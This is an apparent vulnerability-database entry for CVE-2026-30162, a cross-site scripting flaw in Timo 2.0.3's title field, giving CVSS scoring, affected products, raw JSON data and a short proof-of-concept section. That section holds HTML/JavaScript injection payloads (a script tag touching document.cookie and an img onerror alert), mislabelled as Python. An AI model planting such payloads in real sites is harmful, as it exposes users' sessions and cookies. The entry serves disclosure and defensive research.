Security Vulnerability Report
中文
CVE-2026-30162 CVSS 6.1 MEDIUM

CVE-2026-30162

Published: 2026-03-26 15:16:37
Last Modified: 2026-03-31 21:08:50

Description

Cross Site Scripting (xss) vulnerability in Timo 2.0.3 via crafted links in the title field.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:auntvt:timo:2.0.3:*:*:*:*:*:*:* - VULNERABLE
Timo 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-30162 --> <!-- Inject this payload into the 'title' field --> <script> alert('CVE-2026-30162 XSS Triggered'); console.log(document.cookie); </script> <!-- Alternative HTML tag injection --> <img src=x onerror=alert('XSS')>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30162", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:36.600", "lastModified": "2026-03-31T21:08:50.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (xss) vulnerability in Timo 2.0.3 via crafted links in the title field."}, {"lang": "es", "value": "Vulnerabilidad de Cross Site Scripting (XSS) en Timo 2.0.3 mediante enlaces manipulados en el campo de título."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auntvt:timo:2.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "47BB5F2F-7D3C-4A80-ADDC-AF8938CA39DB"}]}]}], "references": [{"url": "https://github.com/auntvt/Timo/issues/10", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Issue Tracking"]}]}}